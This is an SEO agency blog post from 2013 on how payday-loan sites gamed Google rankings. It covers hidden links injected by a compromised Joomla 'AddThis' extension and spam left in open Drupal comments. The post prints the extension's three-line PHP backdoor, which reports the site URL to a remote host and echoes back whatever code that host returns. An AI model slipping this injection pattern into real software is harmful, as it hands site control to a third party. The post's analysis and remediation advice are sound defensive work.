Just type away and hit enter


Pay Day Loan rankings: The shady tale of Joomla hacks and Drupal leaks

Pay Day Loan rankings: The shady tale of Joomla hacks and Drupal leaks

Life at Click Consult is never boring. We are constantly researching the best methods to keep us up to date and providing the best service we possibly can. We are continuously reading, experimenting and discussing the ever changing way in which the way the web is organised

One of our many experiments involved several of our SEO team getting assigned random keywords, picked from a selection, to monitor in the SERPS. We would then monitor the rankings over a period of weeks to look out for interesting and unusual ranking behaviour. Whilst I got what turned out to be the very uninteresting “Cheap Mobile Phones” (although I did purchase the fantastic Samsung Galaxy S3 during this time), another member of our team, Paul, got “Payday Loans”. This turned out to be a fascinating thing to research. Paul did a fantastic job in monitoring this and when he showed us the results, we were amazed by what we saw.

Discovering the manipulation

The graph below shows us the top 20 rankings for the keyword “Pay Day Loans” between 12th December 2012 and 21st January 2013:

Graph showing the top 20 rankings for the keyword “Pay Day Loans” between 12th December 2012 and 21st January 2013

What this graphs shows is fascinating. What we are seeing is almost a completely different set of results every day. If we compare this to a relatively normal set of results for another set of keywords “Cheap flights”, it is obvious that there is something quite unusual going on:

Cheap flights rankings graph showing a normal pattern

I was intrigued about this and decided to investigate further.

Using ahrefs.com, I was able to study the sites which are linking to the pay day loan sites which are ranking in Google. I found that the pay day loan companies are using domain names only a few days old, they are then gaining thousands of links to that domain in a very short amount of time, mainly with exact match anchor text. It appears Google sees these links appearing in a short amount of time as a massive ranking factor and boosts the domain straight to or near the top of the results.

This could be perfectly acceptable and natural if a site goes viral all of a sudden, but that is not the case here. The links and methods used to get the links are very unnatural and it is quite disturbing.

I found two common methods being used by several pay day loan companies to boost their site, or a clone of their site, to the top of the rankings in Google.co.uk.

Method 1: Joomla hidden links

The first involves Joomla. Joomla has been downloaded over 30 million times as of March 2012. It is the second most commonly used CMS on the internet after WordPress. It has over 10,000 extensions available. An extension or plugin is additional code written by a third party which creates additional functionality for the CMS. It was one of these extensions that was being exploited to dominate the top result for “Pay day loans” on Google (at the time of writing).

The module in question is called “AddThis for Joomla”, developed by INowWeb.com and has been voted one of the top 20 extensions for Joomla. It adds the popular social media sharing buttons to a website. INowWeb.com appears to have gone rogue or has suffered some sort of massive security breach. The website is mostly currently unavailable, many pages that did exist now return a 404 and the homepage just returns a blank white page, but further pages are certainly returning information.

The extension contains malicious code which injects a hidden link into a website, which is obscured using Javascript and pushed off the viewable page using CSS. Once the extension is installed, it allows the hacker to load whatever code they want into any website which has this extension installed, which appears to be many thousands. They can change the link whenever they like, giving them the ability to get a link on the homepage of thousands of sites almost instantly. The code is generated on the INowWeb.com website and then fetched by the extension. The URL to fetch the code contains parameters telling it which site is infected by the malicious code as shown below. I have hidden the URL of the infected website, but I have contacted them and instructed them on how to fix it.

Compromised site infected by malicious code

At time of writing, payday-mom.co.uk is top of Google for “pay day loans”. This site has many thousands of links pointing to it, including .gov and .edu domains, using the above method. It has been top of Google for at least a week whilst I’ve been monitoring, this shows how effective this method is and makes you wonder why Google has not done anything about it.

The extension was published on the official Joomla extensions website for a length of time allowing it to be downloaded by thousands of people. It has since been removed and replaced with a message saying the extension is under investigation with code UR7, fraud or unethical practices:

Extension under investigation

UR7 Definition

If you have this extension installed, remove it immediately. This should be enough to delete any code you don’t want, but it’s worth a check of your source code to be sure.

Once that domain has eventually been found out and removed from the rankings, the process starts again. It takes very little time as they have their thousands of hacked sites ready, waiting for their updated code and the new domain is back to the top of Google in a matter of days.

Inowweb.com may not be aware of the problems associated with their website and extensions, the site may have been victim of a massive security breach. I am returning the actual data I’ve found which may or may not have come from them.

3 lines of code to rank a website to #1 on Google

After several e-mails to webmasters affected by the infected code, I managed to get a hold of a copy of the malicious file. Three lines are all it takes to bump a site to number 1 in Google in an extremely highly competitive market. These lines are extremely simple:

$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI]; This assigns the websites URL to the variable $path.

$credit=file_get_contents(‘http://www.inowweb.com/power.php?i=’.$path); This is the sneaky bit of code, it connects to the rogue website and grabs the link they would like to display on the infected website, and then assigns the code to the variable $credit. It also tells the rouge website, the URL of the infected website using the $path variable it generated in the above line.

echo $credit; A simple command to display the code from the rogue website on the infected website disguised as a variable called $credit presumably to make it look like it is just displaying the everyday credit real extensions use.


Drupal Leaky Comments

As you do not need to register on the Joomla extension website to download extensions, there is presumably no way to know exactly who has installed this extension and inform them of the problem. Until the webmaster finds out, the malicious user has control over their website to pretty much do what he or she wants. Being able to link to one website from thousands of websites instantly is a massively powerful and dangerous tool. Many of the websites infected are government or education websites, which shows how widespread this problem is.

Method 2: Leaky Drupal blog comments

Drupal is another extremely popular CMS. It is used on an estimated 2.1% of websites across the world, including The Official White House website and a UK Government Website, data.org.uk.

In the latest version of Drupal, the default install configures the site in a way where any new user requires administrator approval before they can use their account. This can be very labour intensive so is often turned off. Once it is turned off, spammers can register as many accounts as they like without the administrator of the site receiving any automatic warnings.

Drupal allows the posting of comments on articles posted. These comments allow some basic HTML by default, including hyperlinks. These hyperlinks are the cause of almost every result in Google’s top 20 results for the keyword “pay day loans”.

The hyperlinks do not contain a nofollow attribute which means that a spammer may post as many links in these comments to the pay day site as they want, and Google will treat them as ranking links. It is good practice to automatically add the nofollow attribute to places where an everyday user can post to deter spammers. Anywhere that allows the general public to post links that do not add the nofollow attribute will quickly become hijacked by spammers.

Personally I find it amazing that Drupal does not include the nofollow attribute by default. Any site that does not fix this will become a spam magnet as is shown by investigating the back links of many of the pay day loan sites.

Recent versions of Drupal do now have a configuration option which allows you to include the nofollow attribute to any posted external links. Instructions to do this can be found at http://drupal.stackexchange.com/questions/18211/how-to-apply-the-attribute-rel-nofollow-to-links-in-the-comments. I would also recommend employing strict automated moderation over any article comments, if you need to have them enabled.

It is quite clear that Drupal is used as the major tool to place these hyperlinks to any unscrupulous pay day loan sites and is a clear indication that Drupal needs to tighten their default installation and include more automated moderation. 15 of the top 20 results in Google, at time of writing, have many hundreds, if not thousands, of backlinks from comments on Drupal websites. It is quite simple to check this yourself using ahrefs.com. Eg. https://ahrefs.com/site-explorer/refdomains/subdomains/payday-loans4you.co.uk. You will be able to see five backlinks of a pay day loan site with that link if you do not have a ahrefs.com account, or the full list if you are a subscriber.

What can I do about it?

No matter which Content Management System (CMS) you are using, you are potentially vulnerable to such an attack. Open source CMS’ particularly will be vulnerable as the source code is available to the general public who can then examine it for any security holes which they could exploit. Most of the most commonly used CMS’ are safe to use if they are installed and configured correctly. There are many guides online with instructions on how to configure these CMS’ to be secure and safe to use effectively.

Always do your research before installing 3rd party code. Check out any reviews and blogs people may have wrote about the extension/plugin/module. If you have any coding experience, take a look through and make sure that there is nothing malicious going on in there or ask a web developer to check it out for you. Always download them from official sites. Although the Joomla extension I have written about was available from the official site, it is still the safest place to get them from and they are quickly removed once a problem has been discovered.

Why doesn’t Google do something about it?

I’m sure there are many conspiracy theorists out there who believe that Google is well aware of what is happening with these corrupt results on their search engine, but does little about them so that genuine companies have to pay through their nose to be listed in the sponsored ads so they have any chance of being listed in a prominent position.

I think the truth is that there are far more people working on ways to exploit the search results than there are working on ways to stop them. Google release hundreds of updates to its algorithm every year so eventually they will make it harder for these rogue companies. They can also take manual action against these sites, but it appears they are very slow to do this, even with the obvious ones. As I’ve already mentioned, the same site has been number one in the rankings the whole time I’ve spent researching this blog. All of the links are formatted quite similarly so it shouldn’t take much tweaking to discount them all. Google seem to remove domains from the rankings quite regularly, but it takes a matter of days for a company to repeat the process with a new domain that costs pennies to register. Maybe the conspiracy theorists are at least partially correct?

There is no doubt that these rogue companies will be affecting the business of legitimate pay day loan companies. They can also be dangerous to use as they do not follow the same regulations as legitimate companies.

Have you been affected by spam on your website? What do you think about Google’s methods of dealing with this scam? Are these rogue companies affecting your legitimate pay day loan company? Let us know.


I thought I would give an update on how this is progressing.

The website I discovered which had been generating the code that was being included on the infected websites has since blanked the link I had used in my example, but there are still other pages on the site generating the code. It appears in the last day or two that the links have changed. Payday24hr.co.uk has started to fall after being top of the SERPs for the last few days, so it appears that whoever is doing this has diverted their attention to payday-joe.co.uk. This domain was registered yesterday (13th February 2013) and currently has no discovered backlinks according to ahrefs.com. I expect this will spike in the next couple of days and will launch that site up the SERPs, as I have seen in the other cases I’ve monitored.

Joomla have banned the developer of the infected extension that I found from adding more extensions to their directory, but have not replied when I asked them if they’re going to notify users via a newsletter or press release. I would have thought this would be advisable due to the vast amount of people affected.

Drupal are claiming it’s the webmasters’ responsibility to stop spam on a website once they have download the software. Whilst I agree with this, surely a CMS as popular and modern as Drupal should be including this tiny attribute by default. Pretty much every other CMS I’ve checked does this by default. By adding the nofollow relationship attribute, they would be closing the door on a major source of spam. I have had no response since I suggested this but I hope that Drupal will be including this in future versions of their software.

I have now also discovered many WordPress sites infected with a similar problem, but I have been unable to pinpoint the infected plugin, if that is what it is. I have spoken to several webmasters that have had their sites hit by this attack and I believe it’s either down to a security issue with the XML-RPC API or an outdated plugin. I am leaning more towards the XML-RPC as most of the sites I checked had different plugins, there seemed to be no consistent one popping up, unless there is a plugin that doesn’t disclose itself.


Keep your software up-to-date! I cannot emphasis this enough. Always make sure you are running the latest version of your CMS and any plugins/extensions/modules you may have installed. If you have installed 3rd party software onto your CMS, always make sure it is up-to-date. If the developer hasn’t updated it for 6 months, you can probably assume it’s been abandoned. Remove it and look for an alternative. WordPress is really good at helping you keep up-to-date. If you are logged in as admin, it will notify you of any updates for the core software, or any plugins and themes. I believe Drupal and Joomla also give you notification of updates available for the core software.

If you use Drupal or Joomla, have a discussion with our Web team to make sure your site is secure and safe from exploits.


Share this:

  • Spot oon with this write-up, I really think this amazing site needs
    much more attention. I’ll probably be returnong
    to read more, thanks for thee advice!

View all posts

The Short Cutts

Google’s Head of Webspam, Matt Cutts, presents regular videos that help webmasters to resolve questions and offer support and advice….

Read Now

SEO Ipsum

Rather than using standard Lorem Ipsum text to fill a page still in development, the SEO Ipsum tool can generate…

Read Now
View all Resources

We use cookies to give you the best experience on our website. If you continue without changing your cookie settings, we assume that you consent to our use of cookies on this device. You can change your cookie settings at any time but if you do, you may lose some functionality on our website. More information can be found in our Cookie Info and Privacy Policy.